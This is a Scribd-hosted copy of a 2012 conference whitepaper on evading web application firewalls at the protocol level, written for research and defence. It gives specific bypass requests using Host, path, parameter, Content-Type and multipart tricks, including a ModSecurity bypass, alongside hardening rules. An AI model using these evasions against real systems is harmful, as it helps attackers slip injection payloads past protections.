0% found this document useful (0 votes)
44 views18 pages

BH US 12 Ristic Protocol Level WP

This document discusses protocol-level evasion techniques that can be used to bypass web application firewalls (WAFs). It begins by providing background on WAFs and their role in security. It then discusses challenges in WAF implementation related to parsing protocols like HTTP and the risk of "impedance mismatch". The main part of the document describes how identifying decision points in a WAF's processing - such as determining the target site based on the hostname - can be exploited to evade detection through subtle request variations. The goal is to expose weaknesses and improve WAF effectiveness through transparency and discussion of technical issues.

Uploaded by

7473489
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
44 views18 pages

BH US 12 Ristic Protocol Level WP

This document discusses protocol-level evasion techniques that can be used to bypass web application firewalls (WAFs). It begins by providing background on WAFs and their role in security. It then discusses challenges in WAF implementation related to parsing protocols like HTTP and the risk of "impedance mismatch". The main part of the document describes how identifying decision points in a WAF's processing - such as determining the target site based on the hostname - can be exploited to evade detection through subtle request variations. The goal is to expose weaknesses and improve WAF effectiveness through transparency and discussion of technical issues.

Uploaded by

7473489
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 18

Protocol-Level Evasion of Web Application Firewalls

Version: 1.0 (10 July 2012)


Author: Ivan Ristic

Web application firewalls (WAFs) are security tools designed to provide an independent security
layer for web applications. Implemented as appliances, network sniffers, proxies or web server
modules, they analyze inbound and outbound data and they detect and protect against attacks.

At some point in the last couple of years, WAFs became an accepted security best practice. It
took a lot of time and a lot of struggle, and it was not going to happen until the PCI Council gave
the WAFs a serious push when they made them an integral part of PCI compliance [1]. (I
remember almost hearing a collective sigh of relief from the WAF vendors. Their daily lives
suddenly certainly became easier.) Today, we have a wide deployment of WAFs, although the
doubts and controversies remain.

Anyhow, I am not here today to talk about the slow adoption of WAFs. That would take too long
and would distract us from more interesting things. I want to talk about something else: how
good are WAFs at doing their job? More specifically, I want to focus on protocol-level evasion,
which is a fairly low-level aspect of WAF operation and one that is often forgotten.

My point is that these things need to be talked about. Because of the various realities of their
business existence, vendors cannot and will not build great security products alone. It can only
be done in effective collaboration with the users, with them building the products and us keeping
them in check. Unless we make it clear that technical quality is important to us, we're not going
to get it.

Thus, my main reason for being here today is my desire to expose the inner workings of WAFs,
increase transparency and work to improve the effectiveness of WAFs. It all comes down to the
following question:

Are WAFs Any Good?


When I am asked this question, I usually re-frame the discussion away from "are the WAFs any
good", to "are the currently available implementations any good?" I prefer to think about what is
possible, rather than about what we have today. Even with that, there is no easy answer. I think
the answer can be a yes, but WAFs are a complex technology and to use them you need to
have someone knowledgeable in the driver's seat. Anecdotal evidence tells us that, in most
deployments, problems arise from mismatched expectations, lack of expertise and time, and
usability issues.

It does not help that, despite the continuous vocal opposition to WAFs, security researchers and
penetration testers aren't actually ensuring the technical weaknesses of WAFs are discussed
properly. Ask yourselves this: when did you last see a good technical comparison of WAFs? Or,
rather, did you ever see a good technical comparison? The answer here is a clear no. The
concept behind WAFs is sound, but we still have a way to go.

In terms of protection, we should accept WAFs for what they really are — a method of
increasing the cost of attacks, but not necessarily something that can repel everyone. I have a
feeling that WAFs could be much more useful if more organizations stopped treating them as
specialized IPS tools for HTTP. There are many other use cases with tremendous potential, for
example application security monitoring (ASM), attack surface reduction, application hardening,
policy enforcement, and so on. Unfortunately, application security budgets are not very big, and
these techniques require a significant time investment.

IDS, IPS, and Deep-Inspection Firewalls

Virtually all of the information here applies not only to WAFs, but to IDS and IPS tools, and
deep-inspection firewalls. In fact, bypassing network-centric security tools is bound to be easier
because, in general, they perform less HTTP processing (parsing) than WAFs.

WAF Implementation Challenges


The most important selling point of a WAF is that it fully understands and processes HTTP, as
well as the many sub-protocols and data formats carried over HTTP. After all, you could deploy
an IPS tool to inspect the traffic byte streams, but today's web vulnerabilities are too complex for
lower-level devices to handle.

The job is not trivial. As any IDS vendor will tell you, interpreting traffic passively is fraught with
traps and problems. WAFs have the luxury of having more CPU cycles available to perform
traffic parsing and analysis, but the smarter you get in your parsing, the easier it is for the
complexity to overwhelm you and you become a victim of evasion.

On one end is a simple byte stream inspection, where you treat a TCP stream or some major
part of a HTTP transaction as a series of bytes, and you try to match your signatures against
that. This approach is powerful, as it can treat any data (no protocol parsing is necessary), but it
can be easily evaded. For example, think about the support for header folding in HTTP. The
mechanism can be used to split a single header value across several lines. Further, simple
inspection does not enable advanced features.

On the other end is smart in-context inspection, with full protocol parsing and evaluation of data
in the appropriate context. For example, you know that a piece of data is a value of a request
header, and you treat the data as such. This approach is very powerful, but very difficult to
implement successfully because you have to deal with dozens of different backend
implementations and their parsing quirks.

I experienced this problem first hand in the years of working on ModSecurity [9], which is a
popular open source WAF. I started ModSecurity in 2002, and worked on it until 2009, maybe
2010. I had always wanted ModSecurity to be very smart, but, every time I pushed it into that
direction, I discovered that being smart is not always the best approach. What I eventually
realised is that you need to be smart and dumb at the same time.

During my research of this topic, I used ModSecurity and ModSecurity Core Rule Set [10] (a
separate distribution of security rules) to test against. In the process, I discovered two previously
unaddressed issues. They were disclosed to Trustwave in June 2012 [2] and consequently fixed
in ModSecurity 2.6.6 and ModSecurity Core Rule Set 2.2.5. The details of the problems will
follow later in the text.

Impedance Mismatch
There's a term for what I am talking about; it's called impedance mismatch [3]. This is a very
important concept for security tools: you're interpreting the stream of data in one way, but
there's a danger that whatever you are protecting is interpreting the same data differently.

I'll give you one example: years ago I was testing a passive WAF. Back then, passive WAFs
were easy to sell, because people wanted security but without risk of downtime. To configure
this particular WAF to monitor a web site, you had to put it on a network somewhere, where it
could see all traffic, and input a web site's hostname.

Deciding if a connection should be expected is a decision point. Decisions points are critical for
WAFs; every time they make a decision there's a risk that they'll do the wrong thing. And it's
very tricky problem, too, because if you make a mistake you become completely blind to
attacks.

I succeeded in bypassing this device on my first attempt, and I did it by adding a single
character to the request payload. Here's the request I sent:

GET /index.php?p=SOME_SQLI_PAYLOAD_HERE HTTP/1.0


Host: www.example.com.
User-Agent: Whatever/1.0

To make this request bypass the WAF, I added a single dot character to the end of the Host
request header. Yes, really. Apparently, the WAF developers had not considered the various
alternative representations of the hostname — they implemented only what worked for them.

There's a bunch of other things I could have tried here. Omitting the Host request header or
using a non-existing hostname often works. A WAF may be configured to select sites and
policies based on the hostname, whereas the backend server may simply always fall back to the
default site when the hostname is not recognized. In addition, for performance reasons WAFs
may stop monitoring a connection after determining that the first request is not intended for the
site, but you can often continue to submit further requests (with the correct hostname) when
persistent connections are enabled.

The main lesson here is that security products must be designed to use their most restrictive
policy by default, and relax policy only when there is a good reason to do so. In other words,
they must be designed to fail securely.
Exploitation of Decision Points for Universal Evasion
I want to go back to decision points because it's a very important concept to understand. A
decision point occurs at any place in the code where the implementation logic has to branch. In
the previous evasion example, the key decision point occurred when the WAF examined the
hostname and determined that it did not match the site that is being protected.

Any decision point can be potentially turned into an evasion point, by performing the following
steps:

1. Pick a target technology stack


2. Identify the processing decision points involved in the processing of some data
3. Generate a number of request variations, each differing in some small detail, and
designed to exercise an individual decision point
4. Note which variations are ignored
5. Try the same variations when a WAF is present, without any attack payload (you want to
see if the WAF will pick up the anomaly itself, and not any other payload you might have
in the request)
6. If the variations are not blocked and detected outright, attempt to develop an exploit
By now you have probably figured out what the rest of this talk is going to be like. We're going to
slice and dice through HTTP looking for important decisions points, and I am going to show you
how bad decisions can be used to evade detection for any attack payload. I don't want to even
try to enumerate all possible techniques, in part because doing so would make a terribly long
and boring talk. I am focusing only on the principles, and a few selected interesting approaches
that worked reliably.

However, as part of this talk I am releasing a catalog of evasion techniques, and there the goal
is to enumerate everything. In addition, I am also releasing a number of tests along with a
simple tool that you can use to test these things yourselves. All these things are now on GitHub
[4], so feel free to try them out. I'd be delighted if some of you would find the topic so interesting
that you'll be compelled to join the project and contribute refinements, new tests and tools.

Virtual Patching
Virtual patching is the process of addressing security issues in web applications without making
changes to application code. For various reasons, organizations are often unable to address
security issues in a timely manner (e.g., no development resources, not allowed to modify the
source code, etc). In such situations, virtual patching can mitigate the problem by reducing the
window of opportunity for the attack. Further, because the application itself is left alone, virtual
patching can be used even with closed-source applications.

Virtual patching is probably one of the most loved WAF features because of its narrow focus
(breakage potential is limited) and potential high value (vulnerability is mitigated).

However, the same aspect that is making virtual patches so useful (precision, and the ability to
control exactly what is allowed through), is also making them prone to bypasses. A large
number of decision points are required to deliver the precision, but the more decision points
there are, the more opportunities for evasion there are.

Before we proceed further, I want to be clear what I mean when I say virtual patching, because
there isn't only one definition of it. Some people have low expectations of this technique and
they might say that they're using virtual patching even when they do things such as enable
blocking in the part the application that is vulnerable (they might be deploying in monitoring-only
mode elsewhere). Or they might be increasing the aggressiveness of their blocking in the
vulnerable spot. These approaches, although no doubt useful, are not what I have in mind.

My definition is much stricter. For me, a virtual patch is what you produce when you spend the
time to understand the part of the application that is vulnerable and the time to understand the
flaw, and in the end produce a patch in which you accept only data that you know to be valid.

This approach is also known as whitelisting, or a positive security model. It is powerful because
you don't need to know what attacks look like; you only need to know what good data looks like.
The catch is that good virtual patches require a great deal of knowledge. They are tricky to
implement correctly, as you shall soon see.

Broadly speaking, virtual patches generally consist of 2 steps:

1. Activation, where you examine the request path to determine if the patch should be
enforced. The site is vulnerable in only one location, so you need to ensure your patch
runs only there and does not interfere with the rest of your site.
2. Inspection, where you examine the vulnerable parameter(s) to determine if they are
safe to allow through
Looking at these two steps, ask yourselves this:

● What if I manipulate the path so that the patch is not activated, but the request is still
delivered to the correct location in the backend?
● What if I manipulate parameters so that my attack payload is missed by the WAF, but
the request is still normally processed by the backend?
Let's take a look.

Attacking Patch Activation


To activate a patch, the WAF needs to examine the request path and match it against the path
of the virtual patch. We are assuming that the hostname/site selection was successful. We're
going to use Apache and ModSecurity for examples, but the approach is the same no matter
which WAF you're dealing with.

Let's suppose that we have an application vulnerable to SQL injection. Normally, you would
exploit it by sending something like this:

/myapp/admin.php?userid=1PAYLOAD

To address this problem I might write a patch like this:


<Location /myapp/admin.php>
# Allow only numbers in userid
SecRule ARGS:userid "!^\d+$"
</Location>

ModSecurity is very good at giving you near-complete control over what is and isn't allowed. Not
all WAFs are able to do this. Those that have fewer controls might be easier to evade. Those
that have more controls are better in the hands of an expert, but also offer more room for
mistakes.

Warming up with PATH_INFO and Path Parameters


Surprisingly, some WAFs are still not familiar with the concept of extra path contents
(PATH_INFO). Against them, the following simple path change works:

/myapp/admin.php/xyz?userid=1PAYLOAD

Simply by appending some random content to the path you completely evade the virtual patch.
The attack does not work against the <Location> tag in Apache, because the value supplied
there is treated as a prefix.

Not all web servers support PATH_INFO, or at least not in all situations. In such cases, a similar
feature called path parameters (there's only a vague mention of it in section 3.3 of the URI RFC)
may come in handy. Consider the following URL:

/myapp/admin.php;param=value?userid=1PAYLOAD

In both cases the operation of this evasion technique is the same: we alter the path so that it is
not matched correctly by the WAF, but still works in the backend.

Attacking Self-Contained ModSecurity Rules


ModSecurity patches are sometimes written to be self-contained, which makes them more
useful. You simply include the virtual patches at the site level, and don't have to worry about
them messing up your Apache configuration:

Take a look at the following example, which is representative of many real-life rules:

SecRule REQUEST_FILENAME "@streq /myapp/admin.php" \


"chain,phase:2,deny"
SecRule ARGS:user "!^[a-zA-Z0-9]+$"

This is what is known in ModSecurity as a chain of rules. The first rule will look at the path to
determine if we're in the right place. The second rule, which runs only if the first rule was
successful, will perform parameter inspection.

On the surface, the above chain works as expected, but, sadly, it suffers from more than one
problem. First, it is vulnerable to the PATH_INFO attack. Append anything to the path, and the
rule is bypassed. The mistake here is in using the @streq operator, which requires a complete
match.

Second, the above rule does not anticipate the use of any path obfuscation techniques. For
example, consider the following functionally equivalent paths:

/myapp//admin.php
/myapp/./admin.php
/myapp/xyz/../admin.php

When the <Location> tag is used, Apache handles path normalization and thus the above
attacks. But with self-contained ModSecurity rules, rule writers are on their own. There's a great
feature in ModSecurity for this, and it's called transformation pipelines [5]. The idea is that,
before a matching operation is attempted, input data is converted from the raw representation
into something that, ideally, abstracts away all the evasion issues.

In this case, all we need to do is apply the normalizePath transformation function to take care of
path evasion issues for us:

SecRule REQUEST_FILENAME "@beginsWith /myapp/admin.php" \


"chain,phase:2,t:none,t:normalizePath,deny"
SecRule ARGS:user "!^[a-zA-Z0-9]+$"

In addition, the updated version of the rule uses @beginsWith, which is safer (@contains is a
good choice too) to counter PATH_INFO attacks.

Variations in Underlying Web Server Platforms


Let's complicate things further. Imagine that your Apache installation is actually a reverse proxy
designed to protect applications running on a Windows-based web server. Several further
evasion techniques come to mind, for example these:

/myapp\admin.php
/myapp\ADMIN.PHP

These will actually work, against either the Apache <Location> approach, or the self-contained
ModSecurity rule used above. (You may not necessarily be able to execute these attacks from a
browser, because they sometimes normalize the request URI and in the process convert
backslashes to forward slashes.) The first attack will work because Windows will accept the
backslash character as path separator. The second attack will work because the backend
filesystem on Windows is not case sensitive. This attack is not Windows specific and will work
on any filesystem that is not case sensitive (e.g., HFS).

To counter these new evasion technique in Apache, we have to ditch the comfort of the default
<Location> tag and use the more powerful and more difficult to use pattern-based location
matching. After some trial and error, this is what I came up with:
<Location ~ (?i)^[\x5c/]+myapp[\x5c/]+admin\.php>
SecRule ARGS:userid "!^\d+$"
</Location>

To deal with the problem, we have to:

1. Resort to using the special regex-based <Location> syntax


2. Escape all meta-characters in the path (e.g., \.)
3. Activate lowercase pattern matching with (?i)
4. Treat backslashes as path separators
5. Manually handle multiple consecutive path separators
Frankly, I don't have much faith in the solution. It may or may not work, but it's too convoluted
for my liking. Something that complicated is difficult to secure reliably.

ModSecurity has a much better way to handle these attacks, whereby in the transformation
pipeline instead of normalizePath, which was designed for Unix platforms, you use
normalizePathWin, which was designed for Windows platforms. In addition, we are going to
convert the path to lowercase:

SecRule REQUEST_FILENAME "@beginsWith /myapp/admin.php" \


"chain,phase:2,t:none,t:lowercase,t:normalizePathWin,deny"
SecRule ARGS:userid "!^[0-9]+$"

The first transformation will convert input to lowercase. The second will normalize the path first
converting backslashes to forward slashes, and then performing path normalization as
normalizePath does.

Path Parameters Again


Path parameters are actually path segment parameters, which means that any segment of a
path can have them. The following works against Tomcat:

/myapp;param=value/admin.php?userid=1PAYLOAD

And even a single semicolon is enough to break up the path:

/myapp;/admin.php?userid=1PAYLOAD

Let's try to counter this evasion in Apache:

<Location ~
(?i)^[\x5c/]+myapp(;[^\x5c/]*)?[\x5c/]+admin\.php(;[^\x5c/]*)?>
SecRule ARGS:userid "!^\d+$"
</Location>

This seems to work but can we reasonably expect anyone to write and maintain such rules?

ModSecurity does not currently have a transformation function that removes path segment
parameters, which would be the ideal approach to keep virtual patches relatively simple. In
absence of such transformation function, the possible defenses are to use the above pattern
with an @rx operator or detect presence of invalid path segment parameters (which may not be
easy, because there are legitimate uses for them — for example session management) and
reject the transaction on that basis alone.

Short Names for Apache Running on Windows


The Windows operating system supports long filenames today, but this feature was introduced
at some point half way through its evolution. To support legacy applications, even today, every
file with a long name also has a short name associated with it. These short names are great for
evasion, because they are like a passage to your application hidden from the WAF, but known
to the web server.

This evasion technique cannot be used against IIS, but it works well against Apache when it is
running on Windows, presumably because Apache does not implement any Windows-specific
countermeasures. Thanks to Johannes Dahse, who pointed out this out to me when he was
reviewing this document.

Further Problems with Older IIS Versions


The point at which one comes close to admitting defeat, at least when it comes to performing
virtual patching in an elegant way, is when IIS 5.1 gets involved. The rich path handling and
normalization features of IIS 5.1 allow many other evasion techniques:

● Overlong 2- or 3-byte UTF-8 representing either / (%c0%af and %e0%80%af) or \


(%c1%9c and %e0%81%9c)
● In fact, any overlong UTF-8 character facilitates evasion
● Best-fit mapping of UTF-8; for example U+0107 becomes c
● Best-fit mapping of %u-encoded characters (does not work against Apache, which does
not support %u encoding)
● Full-width mapping with UTF-8 encoded characters; for example U+FF0F becomes /
● Full-width mapping of %u encoding (does not work against Apache, which does not
support %u encoding)
● Terminate URL path using %00 (does not work against Apache, which always responds
with 404)
Against both IIS 5 and IIS 6:

● Encode slashes using %u encoding (does not work against Apache, which does not
support %u encoding)
Against some very old IIS installations:

● Bypass patch activation using Alternate Data Streams (e.g., append ::$DATA to the
path)
Fortunately, most of these issues were addressed in newer IIS releases (IIS7+). Unfortunately,
WAFs are often deployed to protect legacy systems that no one knows how to upgrade, so
chances are the problems are still rife. A good WAF should be able to handle all of the above
problems within its default protection rules.
Attacking Parameter Verification
Even after a patch is activated, it still needs to apply correct checks to the correct parameters. In
my experience, this is generally easy to bypass with one of the techniques presented in this
section.

Multiple parameters and parameter name case sensitivity


The simplest evasion technique of this type to try is to submit more than one parameter, some
containing innocent data, some containing attack payloads. A badly written defense mechanism
may screen the first or the last parameter, missing the others.

For example:

/myapp/admin.php?userid=1&userid=1PAYLOAD

Another similar approach is to vary case in the parameter name, in the expectation that some
mechanisms may implement case sensitive name detection.

PHP's treatment of cookies as parameters


In PHP, configuration can dictate that request parameters are extracted not only from the query
string and request body, but also from cookies. This used to be the default setting, actually, but
it changed at some point (probably when 5.3.0 was introduced).

Consider the following code:

$_REQUEST['userid']

and the following request:

GET /myapp/admin.php
Cookie: userid=1PAYLOAD

With a vulnerable PHP application the above will bypass the WAF that does not treat cookies as
parameters. Further, even though the Cookie specification defines cookie values as opaque,
PHP will URL-decode the supplied values.

HTTP Parameter Pollution


HTTP Parameter Pollution (HPP), documented by Luca Carettoni and Stefano di Paola in 2009
[6], exploits the fact that there is no standard way to handle multiple occurrences of same-name
parameters. Some platforms will process the first value, some the last, and some will —
depending on the code — even combine multiple parameter values into a single string. This is a
problem for WAFs because they see two separate parameters, whereas the application sees
only one. But which one, and what is the contents?

Assuming the following request with two same-name parameters:

/myapp/admin.php?userid=1&userid=2
the following table demonstrates the behavior of major web application platforms (much more
information is available in Luca's and Stefano's presentation [6]):

Technology Behavior Example

ASP Concatenate userid=1,2

PHP Last occurrence userid=2

Java First occurrence userid=1

This technique is especially useful for SQL injection because the comma that is the byproduct of
concatenation in the case of ASP applications can be arranged to work as part of SQL.

Because same-name parameters are often used by applications (selecting more than one
option in a list will produce them), HPP is difficult to detect without some knowledge of the
application.

To counter HPP, virtual patches should be written to restrict the number of same-name
parameters submitted to the application (there's an example of this later in the text). Assuming
individual parameter values are properly validated, it is difficult to use HPP for protocol-level
evasion. It's far more useful for the evasion of the signatures that attempt to detect specific
issues (e.g., SQL injection).

Tricks with Parameter Names


Speaking of tricks, my favourite one is the transformation of parameter names done by PHP.
This problem was documented long ago in the ModSecurity Reference Manual, and I wrote
about it again on my blog in 2007 [8]. If you submit parameter names with funny characters,
PHP will tidy up for you. For example, whitespace from the edges is removed. Whitespace and
a few other characters inside parameter names are converted to underscores. This is very
handy for evasion. Simply use a + character in front of parameter name and you're done.

/myapp/admin.php?+userid=1PAYLOAD

This problem emphasizes the often-used (and wrong) approach in virtual patching, where you
inspect only parts of the request. For example, if you remember our patch from earlier, it had
this rule:

SecRule ARGS:userid "!^\d+$"

Clearly, if the WAF does not see the userid parameter, it won't do anything. To address this
problem, virtual patches should be designed to reject any unknown parameters.
Invalid URL-Encoding
There's an interesting behavior on the ASP platform (and potentially elsewhere), that applies
here. If you supply invalid URL encoding, ASP will remove the % character from the string.

/myapp/admin.php?%userid=1PAYLOAD

This reminds me of a very old problem from the time when many web applications were still
developed in C, and had their own custom URL decoders. Some applications would not check
the range of characters used in the encoding, and would proceed to decode payloads that are
not hexadecimal numbers. For example, normally you would encode i as %69:

/myapp/admin.php?user%69d=1PAYLOAD

But with an incorrectly implemented decode function, %}9 might work just the same:

/myapp/admin.php?user%}9d=1PAYLOAD

Writing Good Virtual Patches


Most tricks targeting parameter verification can be mitigated with a few simple to follow rules:

1. Enumerate all parameters


2. For each parameter, determine how many times it can appear in the request
3. For each parameter, check that the value conforms to the desired format
4. Reject requests that contain unknown parameters
5. Reject requests that use invalid encoding (not as part of the patch itself, but as part of
the global WAF configuration)
Here's an example of the above, using ModSecurity:

<Location /index.php>
SecDefaultAction phase:2,t:none,log,deny

# Validate parameter names


SecRule ARGS_NAMES "!^(articleid)$" \
"msg:'Unknown parameter: %{MATCHED_VAR_NAME}'"

# Expecting articleid only once


SecRule &ARGS:articleid "!@eq 1" \
"msg:'Parameter articleid seen more than once'"

# Validate parameter articleid


SecRule ARGS:articleid "!^[0-9]{1,10}$" \
"msg:'Invalid parameter articleid'"
</Location>
Attacking Parameter Parsing
In requests that use the GET method, you know that any supplied parameters are in
application/x-www-form-urlencoded format. However, when the POST method is used, you
have to first correctly identify the type of encoding used. As it turns out, this is a nice opportunity
for evasion.

If you cannot identify the encoding, the best you can do is treat the request body as a stream of
bytes, and inspect that. That is actually an excellent second line of defense, but it does not work
very well in all cases, virtual patching in particular.

Omitting Content-Type or supplying an arbitrary value


First of all, you can try to confuse WAFs by not providing a Content-Type header. That may
cause them to skip processing the body, whereas the backend application may proceed
because its processing is hard-coded.

The WAF may be designed to reject transactions that do not have C-T set, in which case you
may attempt to submit some random value that does not match the type of the payload. With
such C-T the transaction will be valid, strictly speaking, yet the WAF will not be able to process
it correctly. The backend application, with its hard-coded functionality, will happily handle the
data.

In the most difficult case, that of a WAF rejecting unknown MIME types, the best approach is to
submit multipart/form-data in the Content-Type header, along with a request body that can be
parsed as both urlencoded and multipart format. The former will be designed for the application
to consume, and the latter for the WAF.

Attacks Against Format Detection


Not all applications hard-code request body processing, but some are pretty lax in determining
the correct encoding. This became apparent to me when I was reading the source code of
Apache Commons FileUpload [11], a very popular Java library that handles multipart/form-data
parsing. When detecting multipart/form-data, it will examine the Content-Type request header
and treat any MIME type that begins with multipart/ as multipart/form-data. Hmmm, I
wonder what we can do with that?

One approach might be to send multipart/whatever as the MIME type, with the body in
multipart/form-data. The application will decide if the request body does indeed contain
multipart/form-data and process it accordingly. But what will the WAF do?

If you're lucky, your WAF will block upon encountering an invalid or unknown MIME type. If it
does not, anything you put in the request body will potentially evade evasion.

Apache Commons FileUpload is not the only library with lax MIME type detection. A quick
inspection of other popular libraries have equally bad or worse implementations.

Evading ModSecurity
By default, ModSecurity has only a small number of rules in its default configuration. The
purpose of these rules is to check that processing has been performed correctly. These rules do
not check that the supplied MIME type is valid, or known, so using multipart/whatever
against ModSecurity will work when it is used to protect applications relying on the FileUpload
library.

If you are using ModSecurity, but not the separate Core Rule Set package (see below), you
need to add custom rules to your configuration to ensure only known MIME types are allowed
through. ModSecurity does not perform bytestream inspection of unknown content, which
means that it will pass through whatever it does not recognize.

It is difficult for WAFs to be secure by default because different applications will use different
MIME types. If you start with strict configuration, usability suffers. If you start with a lax
configuration, it is the security that suffers. WAFs can't win here.

Evading ModSecurity Core Rule Set


ModSecurity Core Rule Set (CRS), distributed separately from ModSecurity, is stricter — it
allows only requests using known MIME types. However, when I examined the implementation,
I found that it was flawed. This is not the same rule, but a rule that emulates the approach:

SecRule REQUEST_CONTENT_TYPE "!@within \


application/x-www-form-urlencoded multipart/form-data"

The @within operator will look for a substring match, which means that any substring of the
above value would work, a single character even. So now we know that we can bypass this
control using invalid MIME types, which may be useful.

One such invalid MIME type is very useful in combination with Apache Commons FileUpload. If
you recall, its check is lax. If we supply multipart/ as the MIME type, the library will accept that
as multipart/form-data. At the same time, ModSecurity will not know what to do with the payload,
and will allow it through without any processing.

If you are a CRS user, you should upgrade to 2.2.5, which should address this problem.

Multipart Evasion
Multipart parsing has always been my favourite area of evasion. Not only is the specification
very shallow and ambiguous, but the multipart/form-data encoding is often forgotten, because
it's needed only by the sites that need file uploads. But people tend to forget that even
applications that do not use file uploads can be forced into processing request bodies in
multipart/form-data format.

Multipart processing flow is as follows:

1. Recognize presence of multipart/form-data request body


2. Extract boundary
3. Process request body data
a. Extract parts
b. Determine part type
c. Extract part name
d. Extract part value

Common programming mistakes


There are two ways in which you can discover what evasion techniques work. One is to read the
source code of the library or framework used by the target web site. This is the preferred
approach to use initially, because you are going to expose yourself to a number of common
programming mistakes and corner-cutting.

There are several very common types of problems:

● Partial implementations, which cover only what is commonly used by major browsers,
but leave the edge cases unimplemented (e.g., HTTP request header folding)
● Lack of proper parsing, relying instead on crude substring matching or regular
expressions
● Not detecting invalid or ambiguous submissions
● Trying to recover from serious problems, in the name of interoperability
Let's now look at all processing steps, one at a time.

Content-Type evasion
As already discussed, the goal with this approach is to trick the WAF into treating a
multipart/form-data MIME type as something else, while the backend is operating normally.
There's a number of approaches we can try here, for example:

Content-Type: multipart/form-data ; boundary=0000


Content-Type: mUltiPart/ForM-dATa; boundary=0000
Content-Type: multipart/form-datax; boundary=0000
Content-Type: multipart/form-data, boundary=0000
Content-Type: multipart/form-data boundary=0000
Content-Type: multipart/whatever; boundary=0000
Content-Type: multipart/; boundary=0000

The last example is what bypassed ModSecurity Core Rule Set.

Boundary evasion
The goal of this evasion technique is to get the backend application to use one value for the
boundary, while tricking the WAF to use another value. Once that's possible, you can craft
attack payload in such a way that it can be correctly processed no matter what boundary value
is used. The end result is that the WAF misses the attack payload.

Examples:
Content-Type: multipart/form-data; boundary =0000; boundary=1111
Content-Type: multipart/form-data; boundary=0000; boundary=1111
Content-Type: multipart/form-data; boundary=0000; BOUNDARY=1111
Content-Type: multipart/form-data; BOUNDARY=1111; boundary=0000
Content-Type: multipart/form-data; boundary=ABCD
Content-Type: multipart/form-data; boundary=0000'1111
Content-Type: multipart/form-data; boundary="0000"

Part evasion
The multipart format allows arbitrary data to appear before the first part, as well as after the last
part. In some cases this can be exploited. For example, PHP used to process all parts, even
those that appeared after the part marked as being last.

In 2009, Stefan Esser reported [7] that this problem could be used to bypass ModSecurity
running in front of a PHP application.

Parameter name evasion


Each part in a multipart submission has a name. If you can get the WAF to use an incorrect
name, you succeed with evasion. The tricks here are similar to those used when attacking
boundary detection.

Content-Disposition: form-data; name="one"; name="two"


Content-Disposition: form-data; name="one"; name ="two"

For example, PHP will always use the last parameter value (two in the first example), but it's
also picky when it comes to parsing, and may "miss" the value that it is not in exactly the format
it wants it to (this is why the name of the field is one in the second example).

ModSecurity will detect this attack because it does not allow multiple same-name parameters in
a Content-Disposition part header. Similarly, it does not allow unknown parameters to be used.

Parameter type evasion


There are two types of parameters. Normal parameters are equivalent to those in the
urlencoded format. File parameters are files. Some WAFs treat the contents of the files
differently. In ModSecurity, for example, the contents of the files are not inspected. So, if you
can trick ModSecurity into believing something is a file when it is not, you evade it.

This is what the C-D header of a file part looks like:

Content-Disposition: form-data; name="f"; filename="test.exe"

If the filename parameter is present, the part is considered to contain a file. If the filename
parameter is not present, the part is considered to contain a normal parameter.

There was already a bypass in this area, which Stefan Esser discovered [7] in 2009 (that was
after I had left the project, and I was not involved in the patching effort). It applied to a
deployment of ModSecurity protecting a PHP application. Stefan determined that PHP
supported single quotes for escaping in the C-D header, whereas ModSecurity supported only
double quotes. ModSecurity was subsequently patched to add support for single quote-
escaping, and all was well.

Earlier this year, when I started researching evasion, I decided to re-visit all historic evasion
issues and double-check them. The logic is simple: where you discover one unusual behavior
you may discover another. After reading the PHP source code, I understood that the original
vulnerability was not in the code that parses key-value pairs, but in the code that executes
before that, and which breaks the C-D value into key-value pairs.

Content-Disposition: form-data; name=1"2;3"4; filename=5

In the example the double quotes (single quotes can be used too) are effectively shielding the
semicolon, which is the termination character for a key-value pair. So, as far as PHP is
concerned, the semicolon is data. For everyone else, it's part of the C-D syntax.

Once you understand the core issue, it's clear that ModSecurity's patch was insufficient. All you
need to exploit the problem is to add a single non-quote character as the first character in the
parameter value. Like this:

Content-Disposition: form-data; name=x';filename="';name=userid"

PHP allows you to use quote characters anywhere on the line, but ModSecurity's parser is quite
strict, so the only place where the exploit can be used is in the parameter value.

Once the evasion payload is removed, this is what PHP sees:

name = userid

Although there are two name parameters, the first one is overwritten by the second one.

On the other hand, ModSecurity sees this:

name = x'
filename = ';name=userid

The evasion messes up the parameter names as observed by ModSecurity. That alone can
interfere with any virtual patches that may be deployed. More importantly, the part is treated as
a file and bypasses all inspection.

Acknowledgements
Thanks to Johannes Dahse, Mario Heiderich, Krzysztof Kotowicz, Marc Stern, and Josh Zlatin
for providing feedback to the draft versions of this paper.
References
1. PCI Data Security Standard (PCI DSS): Application Reviews and Web Application
Firewalls Clarified (2008)
2. ModSecurity and ModSecurity Core Rule Set Bypasses, by Ivan Ristic (2012)
3. External Web Application Protection: Impedance Mismatch, by Ivan Ristic (2005)
4. IronBee WAF Research on GitHub
5. ModSecurity Reference Manual, Transformation functions
6. HTTP Parameter Pollution, by Luca Carettoni and Stefano di Paola (2009)
7. Shocking News in PHP Exploitation, by Stefan Esser (2009)
8. PHP Peculiarities for ModSecurity Users, by Ivan Ristic (2007)
9. ModSecurity open source web application firewall
10. ModSecurity Core Rule Set
11. Apache Commons FileUpload

You might also like